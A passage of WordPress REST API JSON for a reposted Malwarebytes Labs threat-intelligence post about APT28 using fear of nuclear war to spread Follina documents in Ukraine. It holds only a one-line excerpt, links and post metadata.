href=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/06\/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine\/\">Russia&#8217;s APT28 uses fear of nuclear war to spread Follina docs in Ukraine<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n<p><a href=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/06\/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine\/\" target=\"bwo\" >https:\/\/blog.malwarebytes.com\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Threat Intelligence Team| Date: Tue, 21 Jun 2022 15:25:09 +0000<\/strong><\/p>\n<p>Threat actors associated with Russian intelligence are using the fear or nuclear war to spread data-stealing malware in Ukraine.<\/p>\n<p>The post <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\/threat-intelligence\/2022\/06\/russias-apt28-uses-fear-of-nuclear-war-to-spread-follina-docs-in-ukraine\/\">Russia&#8217;s APT28 uses fear of nuclear war to spread Follina docs in Ukraine<\/a> appeared first on <a rel=\"nofollow\" href=\"https:\/\/blog.malwarebytes.com\">Malwarebytes Labs<\/a>.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10488,10378],"tags":[12040],"class_list":["post-19399","post","type-post","status-publish","format-standard","hentry","category-malwarebytes","category-security","tag-threat-intelligence"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19399","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=19399"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/19399\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=19399"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=19399"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=19399"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}